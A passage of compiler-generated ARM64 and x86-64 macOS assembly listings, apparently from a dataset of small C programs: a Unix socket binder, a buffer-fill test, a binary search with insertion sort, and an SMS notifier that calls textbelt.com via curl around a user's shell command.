adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _perror
mov w8, #1
str w8, [sp, #72]
b LBB0_9
LBB0_8:
str wzr, [sp, #72]
b LBB0_9
LBB0_9:
ldr w8, [sp, #72]
str w8, [sp, #20] ; 4-byte Folded Spill
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_11
b LBB0_10
LBB0_10:
bl ___stack_chk_fail
LBB0_11:
ldr w0, [sp, #20] ; 4-byte Folded Reload
ldp x29, x30, [sp, #192] ; 16-byte Folded Reload
add sp, sp, #208
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "usage: %s /path/to/socket\n"
l_.str.1: ; @.str.1
.asciz "socket"
l_.str.2: ; @.str.2
.asciz "bind"
l_.str.3: ; @.str.3
.asciz "close"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $176, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -124(%rbp)
movl %edi, -128(%rbp)
movq %rsi, -136(%rbp)
cmpl $2, -128(%rbp)
je LBB0_2
## %bb.1:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movq -136(%rbp), %rax
movq (%rax), %rdx
leaq L_.str(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $1, %edi
callq _exit
LBB0_2:
movq -136(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -152(%rbp)
movq $104, -160(%rbp)
leaq -120(%rbp), %rdi
addq $2, %rdi
movq -152(%rbp), %rsi
movq -160(%rbp), %rdx
subq $1, %rdx
movl $104, %ecx
callq ___strncpy_chk
movq -160(%rbp), %rax
subq $1, %rax
movb $0, -118(%rbp,%rax)
movb $1, -119(%rbp)
movl $1, %edi
movl $2, %esi
xorl %edx, %edx
callq _socket
movl %eax, -140(%rbp)
cmpl $-1, %eax
jne LBB0_4
## %bb.3:
leaq L_.str.1(%rip), %rdi
callq _perror
movl $1, -124(%rbp)
jmp LBB0_9
LBB0_4:
movl -140(%rbp), %edi
leaq -120(%rbp), %rsi
movl $106, %edx
callq _bind
cmpl $0, %eax
je LBB0_6
## %bb.5:
leaq L_.str.2(%rip), %rdi
callq _perror
movl $1, -124(%rbp)
jmp LBB0_9
LBB0_6:
movl -140(%rbp), %edi
callq _close
cmpl $0, %eax
je LBB0_8
## %bb.7:
leaq L_.str.3(%rip), %rdi
callq _perror
movl $1, -124(%rbp)
jmp LBB0_9
LBB0_8:
movl $0, -124(%rbp)
LBB0_9:
movl -124(%rbp), %eax
movl %eax, -164(%rbp) ## 4-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_11
## %bb.10:
movl -164(%rbp), %eax ## 4-byte Reload
addq $176, %rsp
popq %rbp
retq
LBB0_11:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "usage: %s /path/to/socket\n"
L_.str.1: ## @.str.1
.asciz "socket"
L_.str.2: ## @.str.2
.asciz "bind"
L_.str.3: ## @.str.3
.asciz "close"
.subsections_via_symbols
| the_stack_data/141856.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _printhelp ; -- Begin function printhelp
.p2align 2
_printhelp: ; @printhelp
.cfi_startproc
; %bb.0:
stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 16
mov x29, sp
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
ldp x29, x30, [sp], #16 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #128
.cfi_def_cfa_offset 128
stp x29, x30, [sp, #112] ; 16-byte Folded Spill
add x29, sp, #112
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
stur w0, [x29, #-8]
stur x1, [x29, #-16]
ldur w8, [x29, #-8]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB1_2
b LBB1_1
LBB1_1:
bl _printhelp
mov w0, #-1
bl _exit
LBB1_2:
ldur w8, [x29, #-8]
subs w8, w8, #2
cset w8, ne
tbnz w8, #0, LBB1_6
b LBB1_3
LBB1_3:
ldur x8, [x29, #-16]
ldr x0, [x8, #8]
adrp x1, l_.str.1@PAGE
add x1, x1, l_.str.1@PAGEOFF
bl _strcmp
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB1_5
b LBB1_4
LBB1_4:
ldur x8, [x29, #-16]
ldr x0, [x8, #8]
adrp x1, l_.str.2@PAGE
add x1, x1, l_.str.2@PAGEOFF
bl _strcmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB1_6
b LBB1_5
LBB1_5:
bl _printhelp
mov w0, #-1
bl _exit
LBB1_6:
ldur w8, [x29, #-8]
subs w8, w8, #3
cset w8, ne
tbnz w8, #0, LBB1_12
b LBB1_7
LBB1_7:
ldur x8, [x29, #-16]
ldr x0, [x8, #8]
adrp x1, l_.str.3@PAGE
add x1, x1, l_.str.3@PAGEOFF
bl _strcmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB1_12
b LBB1_8
LBB1_8:
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
adrp x1, l_.str.5@PAGE
add x1, x1, l_.str.5@PAGEOFF
bl _fopen
stur x0, [x29, #-24]
ldur x8, [x29, #-16]
ldr x0, [x8, #16]
bl _strlen
subs x8, x0, #10
cset w8, ne
tbnz w8, #0, LBB1_10
b LBB1_9
LBB1_9:
ldur x8, [x29, #-16]
ldr x0, [x8, #16]
ldur x1, [x29, #-24]
bl _fputs
ldur x0, [x29, #-24]
bl _fclose
b LBB1_11
LBB1_10:
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
bl _printf
mov w0, #-1
bl _exit
LBB1_11:
b LBB1_12
LBB1_12:
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
adrp x1, l_.str.7@PAGE
add x1, x1, l_.str.7@PAGEOFF
bl _fopen
stur x0, [x29, #-24]
ldur x8, [x29, #-24]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB1_14
b LBB1_13
LBB1_13:
adrp x0, l_.str.8@PAGE
add x0, x0, l_.str.8@PAGEOFF
bl _printf
mov w0, #-1
bl _exit
LBB1_14:
mov x0, #11
str x0, [sp, #16] ; 8-byte Folded Spill
bl _malloc
ldr x1, [sp, #16] ; 8-byte Folded Reload
stur x0, [x29, #-32]
ldur x0, [x29, #-32]
ldur x3, [x29, #-24]
mov x2, #1
bl _fread
ldur x0, [x29, #-24]
bl _fclose
adrp x8, l_.str.9@PAGE
add x8, x8, l_.str.9@PAGEOFF
stur x8, [x29, #-40]
adrp x8, l_.str.10@PAGE
add x8, x8, l_.str.10@PAGEOFF
stur x8, [x29, #-48]
mov x0, #200
bl _malloc
str x0, [sp, #56]
ldr x8, [sp, #56]
strb wzr, [x8]
ldr x0, [sp, #56]
ldur x1, [x29, #-40]
mov x2, #-1
str x2, [sp, #24] ; 8-byte Folded Spill
bl ___strcat_chk
ldr x2, [sp, #24] ; 8-byte Folded Reload
ldr x0, [sp, #56]
ldur x1, [x29, #-32]
bl ___strcat_chk
ldr x2, [sp, #24] ; 8-byte Folded Reload
ldr x0, [sp, #56]
ldur x1, [x29, #-48]
bl ___strcat_chk
mov x0, #4096
bl _malloc
str x0, [sp, #40]
ldr x8, [sp, #40]
strb wzr, [x8]
mov w8, #1
str w8, [sp, #52]
b LBB1_15
LBB1_15: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #52]
ldur w9, [x29, #-8]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB1_18
b LBB1_16
LBB1_16: ; in Loop: Header=BB1_15 Depth=1
ldr x0, [sp, #40]
ldur x8, [x29, #-16]
ldrsw x9, [sp, #52]
ldr x1, [x8, x9, lsl #3]
mov x2, #-1
str x2, [sp, #8] ; 8-byte Folded Spill
bl ___strcat_chk
ldr x2, [sp, #8] ; 8-byte Folded Reload
ldr x0, [sp, #40]
adrp x1, l_.str.11@PAGE
add x1, x1, l_.str.11@PAGEOFF
bl ___strcat_chk
b LBB1_17
LBB1_17: ; in Loop: Header=BB1_15 Depth=1
ldr w8, [sp, #52]
add w8, w8, #1
str w8, [sp, #52]
b LBB1_15
LBB1_18:
ldr x0, [sp, #56]
bl _system
ldr x0, [sp, #40]
bl _system
adrp x8, l_.str.12@PAGE
add x8, x8, l_.str.12@PAGEOFF
str x8, [sp, #32]
ldr x8, [sp, #56]
strb wzr, [x8]
ldr x0, [sp, #56]
ldur x1, [x29, #-40]
mov x2, #-1
str x2, [sp] ; 8-byte Folded Spill
bl ___strcat_chk
ldr x2, [sp] ; 8-byte Folded Reload
ldr x0, [sp, #56]
ldur x1, [x29, #-32]
bl ___strcat_chk
ldr x2, [sp] ; 8-byte Folded Reload
ldr x0, [sp, #56]
ldr x1, [sp, #32]
bl ___strcat_chk
ldr x0, [sp, #56]
bl _system
mov w0, #0
ldp x29, x30, [sp, #112] ; 16-byte Folded Reload
add sp, sp, #128
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "Usage: ./NotifyMe <your shell command>\n\tSetting phone number: ./NotifyMe -d <number>"
l_.str.1: ; @.str.1
.asciz "-h"
l_.str.2: ; @.str.2
.asciz "help"
l_.str.3: ; @.str.3
.asciz "-d"
l_.str.4: ; @.str.4
.asciz "number.txt"
l_.str.5: ; @.str.5
.asciz "w"
l_.str.6: ; @.str.6
.asciz "Invalid phone number lengnth!\n"
l_.str.7: ; @.str.7
.asciz "r"
l_.str.8: ; @.str.8
.asciz "No phone number specified. Set the phone number first!\n"
l_.str.9: ; @.str.9
.asciz "curl -X POST http://textbelt.com/text -d number="
l_.str.10: ; @.str.10
.asciz " -d \"message=Your program execution has started! Go take a coffee break :)\""
l_.str.11: ; @.str.11
.asciz " "
l_.str.12: ; @.str.12
.asciz " -d \"message=Your program execution has finished! Get back to work :)\""
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _printhelp ## -- Begin function printhelp
.p2align 4, 0x90
_printhelp: ## @printhelp
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $80, %rsp
movl $0, -4(%rbp)
movl %edi, -8(%rbp)
movq %rsi, -16(%rbp)
cmpl $1, -8(%rbp)
jne LBB1_2
## %bb.1:
callq _printhelp
movl $-1, %edi
callq _exit
LBB1_2:
cmpl $2, -8(%rbp)
jne LBB1_6
## %bb.3:
movq -16(%rbp), %rax
movq 8(%rax), %rdi
leaq L_.str.1(%rip), %rsi
callq _strcmp
cmpl $0, %eax
je LBB1_5
## %bb.4:
movq -16(%rbp), %rax
movq 8(%rax), %rdi
leaq L_.str.2(%rip), %rsi
callq _strcmp
cmpl $0, %eax
jne LBB1_6
LBB1_5:
callq _printhelp
movl $-1, %edi
callq _exit
LBB1_6:
cmpl $3, -8(%rbp)
jne LBB1_12
## %bb.7:
movq -16(%rbp), %rax
movq 8(%rax), %rdi
leaq L_.str.3(%rip), %rsi
callq _strcmp
cmpl $0, %eax
jne LBB1_12
## %bb.8:
leaq L_.str.4(%rip), %rdi
leaq L_.str.5(%rip), %rsi
callq _fopen
movq %rax, -24(%rbp)
movq -16(%rbp), %rax
movq 16(%rax), %rdi
callq _strlen
cmpq $10, %rax
jne LBB1_10
## %bb.9:
movq -16(%rbp), %rax
movq 16(%rax), %rdi
movq -24(%rbp), %rsi
callq _fputs
movq -24(%rbp), %rdi
callq _fclose
jmp LBB1_11
LBB1_10:
leaq L_.str.6(%rip), %rdi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _printf
movl $-1, %edi
callq _exit
LBB1_11:
jmp LBB1_12
LBB1_12:
leaq L_.str.4(%rip), %rdi
leaq L_.str.7(%rip), %rsi
callq _fopen
movq %rax, -24(%rbp)
cmpq $0, -24(%rbp)
jne LBB1_14
## %bb.13:
leaq L_.str.8(%rip), %rdi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _printf
movl $-1, %edi
callq _exit
LBB1_14:
movl $11, %edi
callq _malloc
movq %rax, -32(%rbp)
movq -32(%rbp), %rdi
movq -24(%rbp), %rcx
movl $11, %esi
movl $1, %edx
callq _fread
movq -24(%rbp), %rdi
callq _fclose
leaq L_.str.9(%rip), %rax
movq %rax, -40(%rbp)
leaq L_.str.10(%rip), %rax
movq %rax, -48(%rbp)
movl $200, %edi
callq _malloc
movq %rax, -56(%rbp)
movq -56(%rbp), %rax
movb $0, (%rax)
movq -56(%rbp), %rdi
movq -40(%rbp), %rsi
movq $-1, %rdx
callq ___strcat_chk
movq -56(%rbp), %rdi
movq -32(%rbp), %rsi
movq $-1, %rdx
callq ___strcat_chk
movq -56(%rbp), %rdi
movq -48(%rbp), %rsi
movq $-1, %rdx
callq ___strcat_chk
movl $4096, %edi ## imm = 0x1000
callq _malloc
movq %rax, -72(%rbp)
movq -72(%rbp), %rax
movb $0, (%rax)
movl $1, -60(%rbp)
LBB1_15: ## =>This Inner Loop Header: Depth=1
movl -60(%rbp), %eax
cmpl -8(%rbp), %eax
jge LBB1_18
## %bb.16: ## in Loop: Header=BB1_15 Depth=1
movq -72(%rbp), %rdi
movq -16(%rbp), %rax
movslq -60(%rbp), %rcx
movq (%rax,%rcx,8), %rsi
movq $-1, %rdx
callq ___strcat_chk
movq -72(%rbp), %rdi
leaq L_.str.11(%rip), %rsi
movq $-1, %rdx
callq ___strcat_chk
## %bb.17: ## in Loop: Header=BB1_15 Depth=1
movl -60(%rbp), %eax
addl $1, %eax
movl %eax, -60(%rbp)
jmp LBB1_15
LBB1_18:
movq -56(%rbp), %rdi
callq _system
movq -72(%rbp), %rdi
callq _system
leaq L_.str.12(%rip), %rax
movq %rax, -80(%rbp)
movq -56(%rbp), %rax
movb $0, (%rax)
movq -56(%rbp), %rdi
movq -40(%rbp), %rsi
movq $-1, %rdx
callq ___strcat_chk
movq -56(%rbp), %rdi
movq -32(%rbp), %rsi
movq $-1, %rdx
callq ___strcat_chk
movq -56(%rbp), %rdi
movq -80(%rbp), %rsi
movq $-1, %rdx
callq ___strcat_chk
movq -56(%rbp), %rdi
callq _system
xorl %eax, %eax
addq $80, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "Usage: ./NotifyMe <your shell command>\n\tSetting phone number: ./NotifyMe -d <number>"
L_.str.1: ## @.str.1
.asciz "-h"
L_.str.2: ## @.str.2
.asciz "help"
L_.str.3: ## @.str.3
.asciz "-d"
L_.str.4: ## @.str.4
.asciz "number.txt"
L_.str.5: ## @.str.5
.asciz "w"
L_.str.6: ## @.str.6
.asciz "Invalid phone number lengnth!\n"
L_.str.7: ## @.str.7
.asciz "r"
L_.str.8: ## @.str.8
.asciz "No phone number specified. Set the phone number first!\n"
L_.str.9: ## @.str.9
.asciz "curl -X POST http://textbelt.com/text -d number="
L_.str.10: ## @.str.10
.asciz " -d \"message=Your program execution has started! Go take a coffee break :)\""
L_.str.11: ## @.str.11
.asciz " "
L_.str.12: ## @.str.12
.asciz " -d \"message=Your program execution has finished! Get back to work :)\""
.subsections_via_symbols
| the_stack_data/95449921.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
str wzr, [sp, #20]
str w0, [sp, #16]
str x1, [sp, #8]
mov x8, #16705
movk x8, #16705, lsl #16
movk x8, #16705, lsl #32
movk x8, #16705, lsl #48
stur x8, [x29, #-24]
mov w8, #16705
sturh w8, [x29, #-16]
sturb wzr, [x29, #-15]
ldur x8, [x29, #-24]
str x8, [sp, #24]
ldurh w8, [x29, #-16]
strh w8, [sp, #32]
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
bl ___stack_chk_fail
LBB0_2:
mov w0, #0
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -32(%rbp)
movl %edi, -36(%rbp)
movq %rsi, -48(%rbp)
leaq -18(%rbp), %rdi
movl $65, %esi
movl $10, %edx
callq _memset
movb $0, -9(%rbp)
movq -18(%rbp), %rax
movq %rax, -28(%rbp)
movw -10(%rbp), %ax
movw %ax, -20(%rbp)
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_2
## %bb.1:
xorl %eax, %eax
addq $48, %rsp
popq %rbp
retq
LBB0_2:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/764837.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _BinarySearch ; -- Begin function BinarySearch
.p2align 2
_BinarySearch: ; @BinarySearch
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur w1, [x29, #-12]
str w2, [sp, #16]
str w3, [sp, #12]
ldr w8, [sp, #16]
ldur w9, [x29, #-12]
add w8, w8, w9
mov w9, #2
sdiv w8, w8, w9
str w8, [sp, #8]
ldur x8, [x29, #-8]
ldrsw x9, [sp, #8]
ldr w8, [x8, x9, lsl #2]
ldr w9, [sp, #12]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
ldr w8, [sp, #8]
add w10, w8, #1
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
b LBB0_9
LBB0_2:
ldr w8, [sp, #8]
ldr w9, [sp, #16]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3:
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
b LBB0_8
LBB0_4:
ldur x8, [x29, #-8]
ldrsw x9, [sp, #8]
ldr w8, [x8, x9, lsl #2]
ldr w9, [sp, #12]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5:
ldur x0, [x29, #-8]
ldr w8, [sp, #8]
add w1, w8, #1
ldr w2, [sp, #16]
ldr w3, [sp, #12]
bl _BinarySearch
b LBB0_7
LBB0_6:
ldur x0, [x29, #-8]
ldur w1, [x29, #-12]
ldr w8, [sp, #8]
subs w2, w8, #1
ldr w3, [sp, #12]
bl _BinarySearch
b LBB0_7
LBB0_7:
b LBB0_8
LBB0_8:
b LBB0_9
LBB0_9:
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _insertionSort ; -- Begin function insertionSort
.p2align 2
_insertionSort: ; @insertionSort
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #24]
str w1, [sp, #20]
mov w8, #1
str w8, [sp, #16]
b LBB1_1
LBB1_1: ; =>This Loop Header: Depth=1
; Child Loop BB1_3 Depth 2
ldr w8, [sp, #16]
ldr w9, [sp, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB1_9
b LBB1_2
LBB1_2: ; in Loop: Header=BB1_1 Depth=1
ldr x8, [sp, #24]
ldrsw x9, [sp, #16]
ldr w8, [x8, x9, lsl #2]
str w8, [sp, #12]
ldr w8, [sp, #16]
subs w8, w8, #1
str w8, [sp, #8]
b LBB1_3
LBB1_3: ; Parent Loop BB1_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #8]
subs w8, w8, #0
cset w8, lt
mov w9, #0
str w9, [sp, #4] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_5
b LBB1_4
LBB1_4: ; in Loop: Header=BB1_3 Depth=2
ldr x8, [sp, #24]
ldrsw x9, [sp, #8]
ldr w8, [x8, x9, lsl #2]
ldr w9, [sp, #12]
subs w8, w8, w9
cset w8, gt
str w8, [sp, #4] ; 4-byte Folded Spill
b LBB1_5
LBB1_5: ; in Loop: Header=BB1_3 Depth=2
ldr w8, [sp, #4] ; 4-byte Folded Reload
tbz w8, #0, LBB1_7
b LBB1_6
LBB1_6: ; in Loop: Header=BB1_3 Depth=2
ldr x8, [sp, #24]
ldrsw x9, [sp, #8]
ldr w8, [x8, x9, lsl #2]
ldr x9, [sp, #24]
ldr w10, [sp, #8]
add w10, w10, #1
str w8, [x9, w10, sxtw #2]
ldr w8, [sp, #8]
subs w8, w8, #1
str w8, [sp, #8]
b LBB1_3
LBB1_7: ; in Loop: Header=BB1_1 Depth=1
ldr w8, [sp, #12]
ldr x9, [sp, #24]
ldr w10, [sp, #8]
add w10, w10, #1
str w8, [x9, w10, sxtw #2]
b LBB1_8
LBB1_8: ; in Loop: Header=BB1_1 Depth=1
ldr w8, [sp, #16]
add w8, w8, #1
str w8, [sp, #16]
b LBB1_1
LBB1_9:
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #144
.cfi_def_cfa_offset 144
stp x29, x30, [sp, #128] ; 16-byte Folded Spill
add x29, sp, #128
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
str wzr, [sp, #36]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
mov x9, sp
add x8, sp, #32
str x8, [x9]
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _scanf
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _printf
str wzr, [sp, #24]
b LBB2_1
LBB2_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #24]
ldr w9, [sp, #32]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB2_4
b LBB2_2
LBB2_2: ; in Loop: Header=BB2_1 Depth=1
ldrsw x9, [sp, #24]
add x8, sp, #40
add x8, x8, x9, lsl #2
mov x9, sp
str x8, [x9]
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _scanf
b LBB2_3
LBB2_3: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #24]
add w8, w8, #1
str w8, [sp, #24]
b LBB2_1
LBB2_4:
ldr w1, [sp, #32]
add x0, sp, #40
str x0, [sp, #8] ; 8-byte Folded Spill
bl _insertionSort
adrp x0, l_.str.5@PAGE
add x0, x0, l_.str.5@PAGEOFF
bl _printf
mov x9, sp
add x8, sp, #28
str x8, [x9]
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _scanf
ldr x0, [sp, #8] ; 8-byte Folded Reload
ldr w8, [sp, #32]
subs w2, w8, #1
ldr w3, [sp, #28]
mov w1, #0
bl _BinarySearch
ldr w8, [sp, #36]
str w8, [sp, #20] ; 4-byte Folded Spill
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB2_6
b LBB2_5
LBB2_5:
bl ___stack_chk_fail
LBB2_6:
ldr w0, [sp, #20] ; 4-byte Folded Reload
ldp x29, x30, [sp, #128] ; 16-byte Folded Reload
add sp, sp, #144
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "The position of the element in sorted array is: %d\n"
l_.str.1: ; @.str.1
.asciz "The element doesn't exist in the array\n"
l_.str.2: ; @.str.2
.asciz "Enter the size of the array: "
l_.str.3: ; @.str.3
.asciz "%d"
l_.str.4: ; @.str.4
.asciz "Enter the elements: "
l_.str.5: ; @.str.5
.asciz "Enter the element to search for: "
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _BinarySearch ## -- Begin function BinarySearch
.p2align 4, 0x90
_BinarySearch: ## @BinarySearch
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
movl %edx, -16(%rbp)
movl %ecx, -20(%rbp)
movl -16(%rbp), %eax
addl -12(%rbp), %eax
movl $2, %ecx
cltd
idivl %ecx
movl %eax, -24(%rbp)
movq -8(%rbp), %rax
movslq -24(%rbp), %rcx
movl (%rax,%rcx,4), %eax
cmpl -20(%rbp), %eax
jne LBB0_2
## %bb.1:
movl -24(%rbp), %esi
addl $1, %esi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB0_9
LBB0_2:
movl -24(%rbp), %eax
cmpl -16(%rbp), %eax
jne LBB0_4
## %bb.3:
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB0_8
LBB0_4:
movq -8(%rbp), %rax
movslq -24(%rbp), %rcx
movl (%rax,%rcx,4), %eax
cmpl -20(%rbp), %eax
jge LBB0_6
## %bb.5:
movq -8(%rbp), %rdi
movl -24(%rbp), %esi
addl $1, %esi
movl -16(%rbp), %edx
movl -20(%rbp), %ecx
callq _BinarySearch
jmp LBB0_7
LBB0_6:
movq -8(%rbp), %rdi
movl -12(%rbp), %esi
movl -24(%rbp), %edx
subl $1, %edx
movl -20(%rbp), %ecx
callq _BinarySearch
LBB0_7:
jmp LBB0_8
LBB0_8:
jmp LBB0_9
LBB0_9:
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _insertionSort ## -- Begin function insertionSort
.p2align 4, 0x90
_insertionSort: ## @insertionSort
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
movl $1, -16(%rbp)
LBB1_1: ## =>This Loop Header: Depth=1
## Child Loop BB1_3 Depth 2
movl -16(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB1_9
## %bb.2: ## in Loop: Header=BB1_1 Depth=1
movq -8(%rbp), %rax
movslq -16(%rbp), %rcx
movl (%rax,%rcx,4), %eax
movl %eax, -20(%rbp)
movl -16(%rbp), %eax
subl $1, %eax
movl %eax, -24(%rbp)
LBB1_3: ## Parent Loop BB1_1 Depth=1
## => This Inner Loop Header: Depth=2
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, -24(%rbp)
movb %al, -25(%rbp) ## 1-byte Spill
jl LBB1_5
## %bb.4: ## in Loop: Header=BB1_3 Depth=2
movq -8(%rbp), %rax
movslq -24(%rbp), %rcx
movl (%rax,%rcx,4), %eax
